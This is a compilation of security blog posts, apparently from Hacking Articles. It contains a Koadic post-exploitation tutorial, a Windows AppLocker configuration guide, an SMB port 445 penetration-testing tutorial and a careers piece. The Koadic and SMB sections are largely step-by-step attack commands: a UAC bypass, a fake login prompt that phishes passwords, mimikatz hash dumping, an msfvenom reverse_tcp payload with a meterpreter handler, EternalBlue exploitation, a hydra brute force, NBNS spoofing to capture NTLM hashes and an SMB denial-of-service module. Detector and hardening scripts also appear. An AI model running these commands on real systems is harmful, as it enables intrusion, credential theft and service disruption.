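                   ($cmd -match '(^|\s|")mshta(\.exe)?("|\s)')
        # The URL argument is the suspicious part: legitimate HTA usage points at a
        # local .hta file, not at a web server (possibly on a non-standard port).
        $url = [regex]::Match($cmd, 'https?://[^\s"'']+', 'IgnoreCase')
        if ($isMshta -and $url.Success) {
            [pscustomobject]@{
                TimeCreated = $Event.TimeCreated
                Host        = $Event.Computer
                ParentImage = $Event.ParentImage
                Url         = $url.Value
                CommandLine = $cmd
                Reason      = 'mshta.exe fetching remote content'
            }
        }
    }
}

# Constructed sample records: one stager launch, one benign local HTA, one unrelated URL.
$sampleEvents = @(
    [pscustomobject]@{ TimeCreated = '2019-03-10 10:01:02'; Computer = 'WS01'
                       Image = 'C:\Windows\System32\mshta.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'mshta http://192.168.1.107:9999/sales' }
    [pscustomobject]@{ TimeCreated = '2019-03-10 10:05:44'; Computer = 'WS01'
                       Image = 'C:\Windows\System32\mshta.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = '"C:\Windows\System32\mshta.exe" "C:\Users\bob\setup.hta"' }
    [pscustomobject]@{ TimeCreated = '2019-03-10 10:07:13'; Computer = 'WS02'
                       Image = 'C:\Windows\System32\notepad.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'notepad.exe http://intranet/readme.txt' }
)

$hits = $sampleEvents | Find-RemoteMshtaLaunch
$hits | Format-Table TimeCreated, Host, Url, ParentImage -AutoSize
# Only the first record is reported; the local .hta launch and the notepad URL are not.
```

The same function works unchanged on real events if you project them to these property names, for example with Get-WinEvent and a calculated-property Select-Object.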

Privilege Escalation with Koadic Implants

Once you have a zombie session, you can use the implant modules for privilege escalation, which include bypassuac.

Koadic contains modules to bypass UAC on Windows 7, 8 and 10, so that you can extract system-level information. We can load this module by running the command below within Koadic.

use implant/elevate/bypassuac_eventvwr

Then, we set the payload value to run the module. You can keep the default zombie value “ALL” to target all zombies or set the particular zombie id you want to target. Use the commands below to set the payload value and the zombie.

set PAYLOAD 0
set ZOMBIE 0
run

Post Exploitation

Generate Fake Login Prompt

You can start a phishing attack with Koadic and capture the victim’s login credentials. We can load this module by running the command below within Koadic.

use implant/phish/password_box
set ZOMBIE 1
run

This launches a login prompt on the victim’s machine.

If the victim enters his password in the fake prompt, you receive the password in Koadic’s command and control.

Enable Rdesktop

Just like Metasploit, Koadic can enable the remote desktop service on the victim’s machine with the following implant module.

use implant/manage/enable_rdesktop
set ZOMBIE 1
run

As you can observe in the image below, job 4 completed successfully and enabled the rdesktop service.

We can confirm the rdesktop service with the help of nmap by checking the state of port 3389.

nmap -p3389 192.168.1.103

Hmm!! As you can observe from the nmap result, port 3389 is open, which means the rdesktop service is enabled.

Inject Mimikatz

This module injects mimikatz into the victim’s machine to extract passwords from it. We can load this module by running the command below within Koadic.

use implant/inject/mimikatz_dotnet2js
set ZOMBIE 1
run

As a result, it dumps the NTLM password hash, which we need to crack. Save the NTLM value in a text file.

Then we use John the Ripper to crack the hash value; run the following command against the hash file as shown below:

john hash --format=NT

As you can observe, it shows 123 as the password recovered from the hash file.

Execute Command

Since we have a high-privileged shell, we are free to run any implant module for post exploitation; here we use exec_cmd to execute any command on the Windows system. To load this implant, run the command given below.

use implant/manage/exec_cmd

Then, we set the CMD value to the command to run, along with the zombie id.

set CMD ipconfig
set ZOMBIE 1
run

Obtain Meterpreter Session from Zombie Session

If you have a zombie session, you can obtain a meterpreter session through it. Generate a malicious file with the help of msfvenom and start a multi/handler listener, as we always do in Metasploit.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe

Koadic provides an implant module that lets you upload any file to the victim’s machine once you have a zombie session. To load this implant, run the following command:

use implant/util/upload_file

Now set the local file path and the zombie id, then run the module. This uploads your malicious file to a writable directory, i.e. %TEMP%.

set LFILE /root/shell.exe
set ZOMBIE 1
run

 

Once the job is completed, use exec_cmd again to run the uploaded file.

use implant/manage/exec_cmd

Then, we set the CMD value to run the uploaded shell.exe, along with the zombie id.

set CMD %TEMP%\shell.exe
set ZOMBIE 1
run

Once the malicious exe is executed from the Koadic zombie session, you will get a meterpreter session in the Metasploit framework, where the handler was set up as shown below:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.107
msf exploit(handler) > set lport 1234
msf exploit(handler) > exploit

Once the file is executed on the machine, we get the victim machine’s meterpreter session as shown below:

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadget lover. Contact here

The post Koadic – COM Command & Control Framework appeared first on Hacking Articles.

Windows Applocker Policy – A Beginner’s Guide

Hello Friends!! This article covers “Microsoft Windows – AppLocker Policy”. It is aimed at system administrators and explains the AppLocker rules used in application control policies and how to work with them.

Table of Content

Introduction to Applocker

  • What is AppLocker Policy?
  • Who Should Use AppLocker?
  • What can your rules be based upon?

Configure the Applocker to Allow/Deny Execution of an App

  • Configure Enforcement rule
  • Create Default Rules

Modify Executable Default Rules to Allow an App

  • Rule conditions
    • Publisher
    • Path
    • File Hash

Modify Windows Installer Default Rules to Allow an App

Modify Script Default Rules to Allow an App

Creating New Rules to Block an APP

Introduction to Applocker

What is AppLocker Policy?

Windows AppLocker is a feature introduced in Windows 7 and Windows Server 2008 R2 as a method to restrict the usage of unwanted programs. AppLocker lets administrators control which executable files are allowed or denied to run. With this policy, administrators can generate rules based on file names, publishers or file location (unique identities of files) and specify which users or groups can execute those applications.

What can your rules be based upon?

The AppLocker console is organized into rule collections: executable files, scripts, Windows Installer files, packaged apps and packaged app installers, and DLL files. These collections let you keep the rules for different application types separate. The following table lists the file formats that are included in each rule collection.

Who Should Use AppLocker?

AppLocker is worthwhile for organizations that need to accomplish any of the following:

  • Control which applications are allowed to run inside the company.
  • Control which users are allowed to run licensed programs.
  • Provide an audit log of which programs users have run.
  • Prevent standard users from installing per-user software.

Configure the Applocker to Allow/Deny Execution of an App

The AppLocker settings live in the Group Policy Object Editor under Computer Configuration > Windows Settings > Security Settings > Application Control Policies > AppLocker.

Configure Enforcement Rule

Use the enforcement setting of each collection to configure it. With Enforce rules, the rules of that collection are enforced and all events are audited.

  1. Select the Configured check box for the rule collection that you are editing, and then verify that Enforce rules is selected.
  2. Click OK.

Open the Advanced tab and enable the DLL rule collection.

Create Default Rules

AppLocker includes default rules for each rule collection. These rules are intended to help ensure that the files that are required for Windows to operate properly are allowed in an AppLocker rule collection.

  • Open the AppLocker console.
  • Right-click the rule type for which you want to generate default rules automatically. You can automatically create executable rules, Windows Installer rules, script rules, and packaged app rules.
  • Click Create Default Rules.

Executable Default Rule Types Include:

  • Allow members of the local Administrators group to run all apps.
  • Allow members of the Everyone group to run apps that are located in the Windows folder.
  • Allow members of the Everyone group to run apps that are located in the Program Files folder.

Modify Executable Default Rules to Allow an App

A rule can be configured to use allow or deny actions:

  • ALLOW : You can specify which files are allowed to run in your environment, and for which users or groups of users.
  • DENY : You can specify which files are not allowed to run in your environment, and for which users or groups of users.

Once you have created the default rules as above, you can modify them as required. For example, if you want to modify the rule “Allow members of the Everyone group to run apps that are located in the Program Files folder” so that a specific user or group may execute a specific program file, open its properties by right-clicking the rule and follow the steps below.

Select the file or folder path that this rule should affect. The asterisk (*) can be used as a wildcard in path rules. For example, %ProgramFiles%\* covers all files and subfolders within that path.

Rule conditions

Rule conditions are the criteria by which AppLocker identifies the applications to which a rule applies. The three condition types are publisher, path and file hash.

Publisher

Identifies an application by its digital signature. The digital signature contains information about the company (the publisher) that created the application.

Advantage:

Frequent updating is not required.

You can apply different values within a certificate.

You can use a single rule to allow a complete product suite.

Within the publisher rule, you can use the asterisk (*) wildcard character to specify that any value should match.

Disadvantage:

While a single rule can be used to allow a complete product suite, all files in the suite must be uniformly signed.

Path

Identifies an app by its location in the computer’s file system or on the network. For well-known paths such as Program Files and Windows, AppLocker uses its own path variables.

Advantages:

Many folders or a single file can be easily controlled.

The asterisk (*) can be used as a wildcard in the rules of the path. For example, %ProgramFiles%\Microsoft Office\* indicates that all files and subfolders within the Microsoft Office folder will be affected by the rule.

Disadvantage:

A rule configured to use a folder path is at risk if that folder contains subfolders that are writable by local users.
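The writable-subfolder weakness just described can be audited rather than assumed. The following PowerShell is an added example, not part of the original article: it reads the effective AppLocker policy, expands the path variables of every path allow rule and lists folders under them that standard users can write to. The variable map and the list of low-privilege principals are my assumptions for a default installation.

```powershell
# Added example (not from the article): audit the folders covered by AppLocker path
# allow rules for subfolders that standard users can write to, the weakness described
# under "Disadvantage" above. Run elevated on a machine with an effective policy.
# The map covers the AppLocker path variables that resolve to fixed local folders;
# %REMOVABLE% and %HOT% are skipped on purpose.

$varMap = @{
    '%WINDIR%'       = @($env:SystemRoot)
    '%SYSTEM32%'     = @((Join-Path $env:SystemRoot 'System32'))
    '%PROGRAMFILES%' = @($env:ProgramFiles, ${env:ProgramFiles(x86)} | Where-Object { $_ })
    '%OSDRIVE%'      = @($env:SystemDrive)          # "C:", the rule path supplies the "\"
}

# Principals that a standard (non-admin) user always belongs to.
$lowPriv   = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
$writeBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData'  # create file / subfolder

function Expand-AppLockerPath([string]$RulePath) {
    # Returns the local folder(s) a path condition covers, or nothing if it cannot be mapped.
    $folder = $RulePath -replace '\\\*$', ''      # strip a trailing "\*"
    foreach ($var in $varMap.Keys) {
        if ($folder.StartsWith($var, 'OrdinalIgnoreCase')) {
            foreach ($root in $varMap[$var]) { $root + $folder.Substring($var.Length) }
            return
        }
    }
    if ($folder -match '^[A-Za-z]:\\') { $folder }  # literal drive path
}

function Test-StandardUserWritable([string]$Dir) {
    try { $acl = Get-Acl -LiteralPath $Dir -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        # Coarse check: an Allow ACE granting file or subfolder creation to a low-privilege
        # principal. Deny ACEs and inheritance flags are not reconciled here; treat hits
        # as candidates to verify, not as proof.
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights -band [int]$writeBits) -ne 0)) { return $true }
    }
    $false
}

[xml]$policy = Get-AppLockerPolicy -Effective -Xml
$findings = foreach ($collection in $policy.AppLockerPolicy.RuleCollection) {
    foreach ($rule in @($collection.FilePathRule | Where-Object { $_ -and $_.Action -eq 'Allow' })) {
        foreach ($cond in @($rule.Conditions.FilePathCondition)) {
            # Only a folder wildcard ("...\*") exposes subfolders; a rule for one file does not.
            if ($cond.Path -notmatch '\\\*$') { continue }
            foreach ($root in Expand-AppLockerPath $cond.Path) {
                if (-not (Test-Path -LiteralPath $root -PathType Container)) { continue }
                $candidates = @(Get-Item -LiteralPath $root) +
                              @(Get-ChildItem -LiteralPath $root -Directory -Recurse -ErrorAction SilentlyContinue)
                $candidates | Where-Object { Test-StandardUserWritable $_.FullName } | ForEach-Object {
                    [pscustomobject]@{ Collection = $collection.Type; Rule = $rule.Name
                                       RulePath = $cond.Path; WritableFolder = $_.FullName }
                }
            }
        }
    }
}

$findings | Format-Table -AutoSize
```

Each folder reported is one where a standard user could drop a binary that the path rule would then allow; the usual fix is to add it as an exception to the rule or tighten its ACL.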

File Hash

Represents the computed cryptographic hash of the identified file. For files that are not digitally signed, file hash rules are safer than path rules.

Advantage:

Since each file has a unique hash, a file hash condition only applies to one file.

Disadvantage:

Whenever the file is updated (such as security updates or upgrades), the hash of the file changes. Consequently, you have to manually update the rules for file hash.

Modify Windows Installer Default Rules to Allow an App

Windows Installer Default Rule Types Include:

  • Allow members of the local Administrators group to run all Windows Installer files.
  • Allow members of the Everyone group to run all digitally signed Windows Installer files.
  • Allow members of the Everyone group to run all Windows Installer files that are located in the Windows\Installer folder.

Similarly, if you want to modify the Windows Installer default rules, repeat the steps above.

Wildcard characters can be used as values in the publisher rule fields according to the following specifications:

Publisher: The asterisk (*) character used by itself represents any publisher.

Product name: The asterisk (*) character used by itself represents any product name.

File name: Either the asterisk (*) or question mark (?) characters used by themselves represent any and all file names.

File version: The asterisk (*) character used by itself represents any file version. If you want to limit the file version to a specific version or as a starting point, you can state the file version and then use the following options to apply limits:

  • Exactly. The rule applies only to this version of the app
  • And above. The rule applies to this version and all later versions.
  • And Below. The rule applies to this version and all earlier versions.

Open Exceptions and then again select Publisher.

Modify Script Default Rules to Allow an App

Script Default Rule Types Include:

  • Allow members of the local Administrators group to run all scripts.
  • Allow members of the Everyone group to run scripts that are located in the Program Files folder.
  • Allow members of the Everyone group to run scripts that are located in the Windows folder.

Similarly, if you want to modify the Script default rules, repeat the steps above.

Select the file or folder path that this rule should affect.

Open Exceptions and then again select Publisher.

 

In this way, you can implement the default rules and modify them for executable files, scripts or Windows Installer files according to your situation.

Creating New Rules to Block an APP

If you want to make your own rule to allow or deny an application, choose the “Create New Rule” option shown below. Let’s say I want to create a new executable rule that restricts command prompt execution for everyone.

You then get a wizard that helps you create an AppLocker rule based on file attributes such as the file path and the digital signature.

NOTE: Install the applications you want to create the rules for on this computer.

Now choose the action to use and the user or group that this rule should apply to. A deny action prevents the affected files from running.

Select the type of primary condition you would like to create. Here we have chosen the “Publisher” option.

Browse for a signed file to use as the reference for the rule. Here we have browsed to cmd.exe; then click Next.

Choose the Publisher as exception and then click Next.

And finally, this will add your rule to restrict the cmd.exe.

Set Application identity to Automatic mode:

Then navigate to “Application identity Property” through Computer Configuration > Policies > Windows Settings > Security Settings > System Services > Application identity.

Then enable “Automatic” option as the service startup mode.

Now update the Group policy with the help of gpupdate command.

Now when you try to open the command prompt “cmd.exe”, you get the restriction prompt shown below.

Note: If you are configuring these rules on a single machine, it takes some time for the rule to be imposed on the machine.
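The same deny rule for cmd.exe can be built, and more importantly tested before it goes live, with the AppLocker cmdlets. This is an added example, not from the original article; the two scratch XML paths are assumed names.

```powershell
# Added example (not from the article): the "deny cmd.exe for Everyone" publisher rule
# built with the AppLocker cmdlets instead of the wizard, checked with Test-AppLockerPolicy
# before it is merged into the local policy. Run in an elevated PowerShell.

$policyFile = Join-Path $env:TEMP 'applocker-deny-cmd.xml'      # assumed scratch path
$effective  = Join-Path $env:TEMP 'applocker-effective.xml'     # assumed scratch path
$cmdExe     = Join-Path $env:SystemRoot 'System32\cmd.exe'
$notepad    = Join-Path $env:SystemRoot 'System32\notepad.exe'  # covered by the default Windows-folder rule

# 1. Read the publisher (signature) details of the reference file, as the wizard does.
$fileInfo = Get-AppLockerFileInformation -Path $cmdExe
if (-not $fileInfo.Publisher) {
    throw "$cmdExe is not signed; a Publisher rule needs a signed reference file"
}

# 2. Build a Publisher deny rule for Everyone from that information and save it as XML.
New-AppLockerPolicy -FileInformation $fileInfo -RuleType Publisher -User Everyone `
                    -Deny -RuleNamePrefix 'Block cmd' -Xml |
    Set-Content -LiteralPath $policyFile -Encoding Unicode

# 3. Test the decision against the new rule before touching the live policy.
Test-AppLockerPolicy -XmlPolicy $policyFile -Path $cmdExe -User Everyone |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize
# Expected: PolicyDecision = Denied for cmd.exe.

# 4. Merge the rule into the local policy (the default rules are kept), make sure the
#    Application Identity service starts automatically, and refresh Group Policy.
Set-AppLockerPolicy -XmlPolicy $policyFile -Merge
# sc.exe is used because Set-Service is refused for this protected service on newer
# Windows 10 builds.
sc.exe config appidsvc start= auto | Out-Null
Start-Service -Name AppIDSvc
gpupdate.exe /force | Out-Null

# 5. Confirm against the effective policy: cmd.exe denied, notepad.exe still allowed.
Get-AppLockerPolicy -Effective -Xml | Set-Content -LiteralPath $effective -Encoding Unicode
Test-AppLockerPolicy -XmlPolicy $effective -Path $cmdExe, $notepad -User Everyone |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize
```

Step 3 is the part the wizard does not offer: a policy can be checked for side effects on other binaries with Test-AppLockerPolicy before any enforcement happens.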

Reference: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/working-with-applocker-rules

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadget lover. Contact here

The post Windows Applocker Policy – A Beginner’s Guide appeared first on Hacking Articles.

SMB Penetration Testing (Port 445)

In this article, we will learn how to gain control over a victim’s PC through the SMB port. There are various ways to do it, and we will take the time to learn all of them, because different circumstances call for different measures.

Table of Content

Introduction to SMB Protocol

  • Working of SMB
  • Versions of Windows SMB
  • SMB Protocol Security

SMB Enumeration

Scanning Vulnerability

Multiple Ways to Exploit SMB

  • Eternal Blue
  • SMB login via Brute Force
  • PSexec to connect SMB
  • Rundll32 One-liner to Exploit SMB
  • SMB Exploit via NTLM Capture

SMB DOS-Attack

Post Exploitation

File Sharing

  • smbserver
  • smbclient

Introduction to SMB Protocol

Server Message Block (SMB), one dialect of which was known as Common Internet File System (CIFS), operates as an application-layer network protocol for file sharing that allows applications on a computer to read and write files and to request services from server programs in a computer network. The SMB protocol can be used on top of TCP/IP or other network protocols. Using the SMB protocol, an application (or the user of an application) can access files or other resources on a remote server. This allows applications to read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request.

Working of SMB

SMB functions as a request-response or client-server protocol. The only time the protocol does not work in a request-response fashion is when a client requests an opportunistic lock (oplock) and the server has to break an existing oplock because the requested mode is incompatible with it. Client computers using SMB connect to a supporting server using NetBIOS over TCP/IP, IPX/SPX, or NetBEUI. Once the connection is established, the client computer or program can open, read/write, and access files much as it would on a local file system.

Versions of Windows SMB

CIFS: The old version of SMB, which was included in Microsoft Windows NT 4.0 in 1996.

SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2.

SMB 2.0 / SMB2: This version used in Windows Vista and Windows Server 2008.

SMB 2.1 / SMB2.1: This version used in Windows 7 and Windows Server 2008 R2.

SMB 3.0 / SMB3: This version used in Windows 8 and Windows Server 2012.

SMB 3.02 / SMB3: This version used in Windows 8.1 and Windows Server 2012 R2.

SMB 3.1: This version used in Windows Server 2016 and Windows 10.

Presently, the latest version of SMB is the SMB 3.1.1 which was introduced with Windows 10 and Windows Server 2016. This version supports AES 128 GCM encryption in addition to AES 128 CCM encryption added in SMB3, and implements pre-authentication integrity check using SHA-512 hash. SMB 3.1.1 also makes secure negotiation mandatory when connecting to clients using SMB 2.x and higher.

SMB Protocol Security

The SMB protocol supports two levels of security. The first is share level. The server is protected at this level and each share has a password. The client computer or user has to enter the password to access data or files saved under the specific share. This is the only security model available in the Core and Core Plus SMB protocol definitions. User-level protection was later added to the SMB protocol. It is applied to individual files and each share is based on specific user access rights. Once a server authenticates the client, he/she is given a unique identifier (UID) that is presented upon access to the server. The SMB protocol has supported individual security since LAN Manager 1.0 was implemented.

SMB Enumeration

Every pentester performs SMB enumeration during network penetration testing to identify the following information about a Windows or Samba system:

  • Banner Grabbing
  • RID cycling
  • User listing
  • Listing of group membership information
  • Share enumeration
  • Detecting if host is in a workgroup or a domain
  • Identifying the remote operating system
  • Password policy retrieval

Here we are using nmap, the most famous network scanning tool, for SMB enumeration.

nmap -p 445 -A 192.168.1.101

As a result, we enumerated the following information about the target machine:

Operating System: Windows 7 ultimate

Computer Name & NetBIOS Name: Raj

SMB security mode: SMB 2.02

There are many automated scripts and tools available for SMB enumeration; if you want to know more about it, read the article “A Little Guide to SMB Enumeration”.

Scanning Vulnerability

During the enumeration phase, we generally perform banner grabbing to identify the version of the running service and the host operating system. Once you have this information, move on to the vulnerability scanning phase to determine whether the installed service is a vulnerable or a patched version.

Nmap provides various scripts to check specific services for vulnerabilities; likewise it has built-in scripts for SMB that report the vulnerable state of a given target IP.

nmap --script smb-vuln* -p 445 192.168.1.101

As a result, it shows that the target machine is highly vulnerable to MS17-010 (EternalBlue) because SMBv1 is enabled.

To know more about MS17-010, read the complete article “3 ways to scan Eternal Blue Vulnerability in Remote PC”.

Multiple Ways to Exploit SMB

Eternal Blue

As we know the target is vulnerable to MS17-010, we can use Metasploit to exploit it. Therefore we run the following module, which directly exploits the target machine.

use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101
msf exploit(ms17_010_eternalblue) > exploit

Boomm!! We have successfully accessed the remote machine’s shell, as shown in the image below.

SMB login via Brute Force

If you fail to find SMB in a vulnerable state, or find a patched version of SMB on the target machine, then brute force is another option to gain unauthorized access to the remote machine.

Here we only need two dictionaries, one containing a list of usernames and one a list of passwords, and a brute-forcing tool to carry out the attack.

hydra -L user.txt -P pass.txt 192.168.1.101 smb

-L  denotes the path of the username list

-P  denotes the path of the password list

Once the command is executed, it starts the dictionary attack, and you will have the right username and password in no time. After a few minutes Hydra cracks the credentials; as you can observe, we successfully obtained the SMB username raj and password 123.

To know more about it, read the complete article “5 Ways to Hack SMB Login Password”.

If you have SMB login credentials, you can use the following module to determine which local users exist via the SAM RPC service.

use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit

PSexec – To Connect SMB

Once you have the SMB login credentials of the target machine, the following Metasploit module gives you a meterpreter session with access to a remote shell.

use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit

Once the commands run, you gain a meterpreter session on the victim’s PC and can access it as you wish.

Many scripts and tools are available for connecting to a remote machine over the SMB protocol; we have already written an article on connecting to SMB in multiple ways. Read the complete article “Multiple ways to Connect Remote PC using SMB Port”.

Rundll32 One-liner to Exploit SMB

This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. It currently supports DLLs and PowerShell.

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

This generates a one-liner that loads the malicious DLL; send it to your target and wait for their action.

As soon as the victim runs the malicious one-liner in the Run prompt or command prompt, we get a meterpreter session in Metasploit.

SMB Exploit via NTLM Capture

Another method to exploit SMB is NTLM hash capture, i.e. capturing the challenge-response password hashes of the SMB target machine.

This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service use by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing easy cracking using Cain & Abel, L0phtCrack or John the Ripper (with the jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb
msf auxiliary(smb) > set srvhost 192.168.1.109
msf auxiliary(smb) > set johnpwfile /root/Desktop
msf auxiliary(smb) > exploit

Simultaneously run the nbns_response module alongside the capture/smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.1.109
msf auxiliary(nbns_response) > set interface eth0
msf auxiliary(nbns_response) > exploit

As a result, this module causes a fake Windows Security prompt on the victim’s system whenever it tries to establish a connection to another system to access its shared folders.

We used nmap UDP and TCP port scans to identify open ports and protocols, and from the image you can observe that port 137 is open for the NetBIOS name service on our local machine.

Now when the victim tries to access our shared folder, he will connect to us through the spoofed name; the image below shows the victim connecting to the malicious IP 192.168.1.109. When he tries to access the shared folder, he is trapped by the fake Windows Security prompt, which asks him to enter his username and password to access the shared folders.

Awesome!! Once again the attacker has captured the NTLMv2 hash; from the image you can see that here too the attacker has captured:

Username: raj

Now use John the Ripper to crack the NTLMv2 hash by executing the command below:

john _smb_netntlmv2

From the image below you can confirm that we successfully retrieved the password 123 for user pentest by cracking the NTLMv2 hash.

To know more about it, read the complete article “4 Ways to Capture NTLM Hashes in Network”.
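On the defending side, both the EternalBlue exploitation and the NTLM capture above rely on configuration a Windows host can do without: SMBv1, unsigned SMB sessions and NetBIOS name resolution. The following PowerShell is an added example that is not part of the original article; it reports those three settings and, with -Fix, hardens them. It assumes Windows 8/Server 2012 or later (the SmbShare and DISM cmdlets) and the reporting layout is my own.

```powershell
# Added example (not from the article): audit and harden the host-side preconditions of
# the attacks above. Checks whether SMBv1 is enabled (the MS17-010 attack surface),
# whether SMB signing is required (limits what captured or relayed NTLM is worth) and
# whether NetBIOS over TCP/IP is on (the udp/137 name service that nbns_response spoofs).
# Run elevated; pass -Fix to apply the changes. SMBv1 removal may require a reboot.

param([switch]$Fix)

function Get-SmbHardeningStatus {
    $srv  = Get-SmbServerConfiguration
    # On client editions SMBv1 is a DISM optional feature; on Server editions check
    # Get-WindowsFeature FS-SMB1 instead.
    $smb1 = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    $nics = Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE'
    [pscustomobject]@{
        Smb1FeatureInstalled = if ($smb1) { $smb1.State -eq 'Enabled' } else { 'n/a (check FS-SMB1 on Server)' }
        Smb1ServerEnabled    = $srv.EnableSMB1Protocol
        SigningRequired      = $srv.RequireSecuritySignature
        # TcpipNetbiosOptions: 0 = from DHCP, 1 = enabled, 2 = disabled
        NetbiosEnabledNics   = @($nics | Where-Object { $_.TcpipNetbiosOptions -ne 2 } |
                                   ForEach-Object Description)
    }
}

function Invoke-SmbHardening {
    # Each step is idempotent, so the function can be re-run safely.
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart -ErrorAction SilentlyContinue | Out-Null
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' | ForEach-Object {
        Invoke-CimMethod -InputObject $_ -MethodName SetTcpipNetbios `
                         -Arguments @{ TcpipNetbiosOptions = 2 } | Out-Null
    }
}

'Before:'
Get-SmbHardeningStatus | Format-List
if ($Fix) {
    Invoke-SmbHardening
    'After:'
    Get-SmbHardeningStatus | Format-List
}
```

Requiring signing protects the server side only; clients that must not hand their NTLM response to a spoofed name also need NetBIOS (and LLMNR) resolution turned off, which the NIC loop above does for this host.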

SMB DOS-Attack

An SMB DoS attack is another method available in the Metasploit framework.

This module exploits a denial-of-service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and force a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\\HOST\share\something) into a web page if the target is using Internet Explorer, or into a Word document otherwise.

use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106
msf auxiliary(ms10_006_negotiate_response_loop) > exploit

Now, when the victim tries to access a shared folder through our malicious IP, the target machine crashes; this attack is very effective.

Post Exploitation

This module will enumerate configured and recently used file shares.

use post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit

As you can observe, it shows three UNC paths that were entered in the Run dialog.

File Sharing

Smbexec.py

Now we will use a Python script that starts an SMB service on our Linux machine. This is useful when the target machine does NOT have a writable share available. You can get this Python script from GitHub.

I copied the Python code from GitHub and pasted it into a text file named smbserver.py in the Desktop folder. Now execute the command shown below to share the folder “raj”.

Since we know the SMB service is running on the host machine 192.168.1.108, we can access its shared folder from a Windows machine through the Run prompt.

Hence you can observe that we successfully accessed the folder “raj” and found two text files, user and pass, in it. In this way we can use the SMB Python script to share files between Windows and Linux machines.

Smbclient

smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

smbclient -L 192.168.1.108

smbclient //192.168.1.108/raj

As you can observe, with the help of smbclient we are able to view the shared folder of the victim’s machine. Moreover, we can use smbclient for sharing files on the network. Here you can observe that we logged in successfully with raj:123 and transferred the user.txt file.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post SMB Penetration Testing (Port 445) appeared first on Hacking Articles.

6 Ways To Learn New Infosec Skills

Staying up-to-date with the latest threats and techniques as well as how to counter them is a challenge for all security professionals. To help boost your efforts with what is a steep learning curve, here are 6 ways to advance your skills — and stimulate your career at the same time.

1. Read a good ol’ book

Because you can read them while you’re commuting to work or before you fall asleep, reading books is a great way to make the most of your valuable time. Or better yet, put down the video game controller, stop binge-watching the latest shows and get to work! Reading will allow you to learn the basics, methodologies, and techniques of whatever topics you feel you need to push your career forward. Here are some books of varying levels that you can start to read this new year:

Helpful hint! Although there’s nothing like the feel of an actual, physical book, reading electronic copies has many advantages for the life-long learner. Highlighting an unfamiliar word, phrase or idea allows you to make notes or search for more information before continuing. This is especially helpful when learning an entirely new skill and getting the foundational concepts solidified in your head. And, of course, it’s great for your back not having to lug huge volumes everywhere you go. It’s especially handy for reference materials that you won’t need every day.

2. Find a mentor

Seeking a mentor can be an extremely effective strategic career move.

There’s nothing better than learning by doing, but you will get stuck. And there’s only so much time to try harder when facing a real-world crisis, especially when no amount of trial-and-error or searching is getting you the solutions you need. That’s why having an expert to lean on is one of the best ways to quickly learn new skills. No one can be an expert in everything, so having multiple mentors is incredibly helpful.

But don’t be greedy with their time and always remember to help in return either directly or by paying it forward.

